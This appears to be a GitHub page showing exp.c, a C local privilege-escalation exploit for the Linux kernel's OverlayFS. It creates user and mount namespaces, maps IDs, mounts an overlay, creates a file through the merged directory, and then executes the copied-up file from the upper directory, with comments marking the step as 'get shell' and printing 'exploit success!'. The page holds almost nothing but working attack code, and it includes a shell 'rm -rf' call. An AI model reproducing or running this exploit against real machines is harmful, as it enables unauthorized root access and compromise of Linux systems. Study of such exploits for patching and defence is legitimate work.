-
Notifications
You must be signed in to change notification settings - Fork 65
/
exp.c
124 lines (118 loc) · 3.02 KB
/
exp.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <sys/capability.h>
// #include <attr/xattr.h>
// #include <sys/xattr.h>
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
#define DIR_BASE "./ovlcap"
#define DIR_WORK DIR_BASE "/work"
#define DIR_LOWER DIR_BASE "/lower"
#define DIR_UPPER DIR_BASE "/upper"
#define DIR_MERGE DIR_BASE "/merge"
#define BIN_MERGE DIR_MERGE "/magic"
#define BIN_UPPER DIR_UPPER "/magic"
static void xmkdir(const char *path, mode_t mode)
{
if (mkdir(path, mode) == -1 && errno != EEXIST)
err(1, "mkdir %s", path);
}
static void xwritefile(const char *path, const char *data)
{
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "open %s", path);
ssize_t len = (ssize_t)strlen(data);
if (write(fd, data, len) != len)
err(1, "write %s", path);
close(fd);
}
static void xreadfile(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd == -1)
err(1, "open %s", path);
int len = 0;
char data[0x100];
while (read(fd, data + len, 1) > 0)
{
len++;
}
data[len] = '\0';
puts(data);
printf("len %d\n", len);
close(fd);
}
void listCaps()
{
cap_t caps = cap_get_proc();
ssize_t y = 0;
printf("The process %d was give capabilities %s\n", (int)getpid(), cap_to_text(caps, &y));
fflush(0);
cap_free(caps);
}
static int exploit()
{
// init work;
char buf[4096];
sprintf(buf, "rm -rf '%s/*'", DIR_UPPER);
system(buf);
xmkdir(DIR_BASE, 0777);
xmkdir(DIR_WORK, 0777);
xmkdir(DIR_LOWER, 0777);
xmkdir(DIR_UPPER, 0777);
xmkdir(DIR_MERGE, 0777);
// mount overlay
uid_t uid = getuid();
gid_t gid = getgid();
printf("uid:%d gid:%d\n", uid, gid);
if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
err(1, "unshare");
xwritefile("/proc/self/setgroups", "deny");
sprintf(buf, "0 %d 1", uid);
xwritefile("/proc/self/uid_map", buf);
sprintf(buf, "0 %d 1", gid);
xwritefile("/proc/self/gid_map", buf);
sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
err(1, "mount %s", DIR_MERGE);
else
puts("[+] mount success");
sprintf(buf, "ls -la %s", DIR_MERGE);
system(buf);
sprintf(buf, "%s/file", DIR_MERGE);
int fd = open(buf, O_WRONLY | O_CREAT, 0666); // touch file
if (fd < 0)
perror("open");
close(fd);
// close fuse
// kill(pid, SIGINT);
return 0;
}
int main(int argc, char *argv[])
{
int pid = fork();
int stat;
if (pid == 0)
{
exploit();
exit(0);
}
wait(&stat);
// get shell
puts("[+] exploit success!");
char buf[0x100];
sprintf(buf, "%s/file", DIR_UPPER);
system(buf);
return 0;
}